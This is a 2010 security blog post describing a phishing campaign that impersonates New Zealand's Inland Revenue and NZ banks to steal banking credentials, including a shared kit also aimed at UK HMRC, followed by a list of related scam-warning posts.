A month ago, the New Zealand Department of Inland Revenue (IRD) issued a warning advising people not to respond to scam emails claiming to offer tax refunds. We have observed these types of scams before, but the individual campaigns come and go. Like any other phishing scam, this email campaign appears to look like a legitimate notification from Inland Revenue complete with the logo.
IRD Tax refund scam email
The link in the message body points to a phony web page that mimics the New Zealand IRD website. But the odd thing is the instruction in a red font stating “Please click on your following bank logo to continue the refund procedure”.
Phishing page linking to various New Zealand bank
Clicking on any of the bank logos opens a fake login page that requires the user to enter their banking credentials and other personal details.
Fake NZ bank login page
While digging around the phishing site, we came across a “readme.txt” file. It basically left hints that this phishing page was a kit authored by “MaxDeMon” written specifically to target online banking users of a range of New Zealand banks.
Phishing kit "readme.txt" page
But Google searching some keywords from the phishing kit, it looks like the kit is used a lot and comes in different variations. Here is a screenshot of a fake “Tax Refund Portal” mimicking UK’s HM Revenue and Customs webpage, again instructing users to click on their bank logo:
Tax refund portal linking to a range of UK banks
The above suggests the ‘package’ is shared around, to be used by multiple groups. Such people only need a PHP web server (preferably a hacked web server) and to configure a PHP file to send phished banking information to their email address. That’s pretty easy, and probably why these type of phishing scams are persistent.
– Rodel Mendrez on M86 Security Labs Blog
Related Posts
- Persistent Domain-Renewal Scam Alive and Kicking
A friend of mine forwarded a suspicious email message recently. I’ve replaced the domain, order number, etc. below:
—————————-
From: Custome... - 2 FREE Southwest Airline Tickets!
Scam Signature Message: 2 FREE Southwest Airline Tickets!Scam Type: Click-Jacking, Bogus OfferTrending: May 2011Why it's a Scam:Clicking the wall post link takes you to the f... - Father walks in on his Daughter… EMBARRASIN!
Scam Signature Message: Father walks in on his Daughter... EMBARRASIN!Scam Type: Survey Scam, Click-JackingTrending: May 2011Why it's a Scam:Clicking the wall post link takes you t... - Royal Wedding or Royal hunt
Instantly this news became? very fruitful? for all kinds of cybercriminals. Here is? some of the proof we found:1) SEO optimized Google image searches leading to a malicious site with the exploit for ... - The Ultimate Profile Viewer is now being released! Shocking for real! See who visits your profile real time!
Scam Signature Message: The Ultimate Profile Viewer is now being released! Shocking for real! See who visits your profile real time! See who invisible you on their friend list chat! Check it now ... - The BLOODIEST Fight EVER – BANNED FROM TV!
Scam Signature Message: The BLOODIEST Fight EVER - BANNED FROM TV!Scam Type: Survey Scam Trending: April 2011Why it's a Scam:Clicking the wall post link takes you to the ... - Malware spammed out as “FaceFacebook Support”.
Another Facebook spam mail pretending that your password is not safe, currently circulating on Internet. The subject is: FaceFacebook Support. Personal data has been changed!ID55733. The email comes w... - 500 free credits from Facebook – malware
There's no such thing as a free lunch - or free Facebook credits. As proof consider the attack described below which has several stages:1) Users get messages with o... - 419 Scammers Still Open to ‘Traditional Postal Services’ Option
Communication in the today's world is dominated by email, instant messaging, and social networking. However, for making any formal statement or announcement, hard-copy letters are still sent using pos... - ygnetwork-ltd.com domain scam
This scam has been around for years - basically, you get an unsolicited email from a company claiming to be a domain registrar in China (it is usually China) that says that someone is trying to regist...
Posted on 24 November 2010. Tags: Persistent, Refund, Scam
